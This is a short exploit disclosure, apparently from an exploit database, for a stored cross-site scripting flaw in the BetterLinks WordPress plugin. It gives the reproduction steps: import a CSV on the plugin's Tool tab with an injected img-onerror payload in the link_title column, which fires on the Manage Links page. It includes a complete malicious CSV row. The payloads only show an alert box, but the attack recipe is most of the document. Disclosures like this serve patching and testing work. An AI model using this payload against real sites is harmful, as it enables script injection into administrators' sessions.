Share
## https://sploitus.com/exploit?id=WPEX-ID:6BC8FFF1-FF10-4175-8A46-563F0F26F96A
Go to Plugin's Settings page, in "Tool" tab, import a CSV file with Betterlinks option. Put a simple XSS payload into "link_title" column in the csv file: title"><img src onerror=alert('xss')>

The XSS will be triggered when accessing Manage Links page.

Example of malicious CSV:

ID,link_author,link_date,link_date_gmt,link_title,link_slug,link_note,link_status,nofollow,sponsored,track_me,param_forwarding,param_struct,redirect_type,target_url,short_url,link_order,link_modified,link_modified_gmt,wildcards,expire,dynamic_redirect,tags,category
1,1,"2021-10-01 12:48:35","2021-10-01 12:48:35",\"><img/src/onerror=alert(/XSSS/)>,slug,note,publish,1,,1,,,307,https://example.com/aaa,go/xss,0,"2021-10-01 12:48:35","2021-10-01 12:48:35",0,,,,uncategorized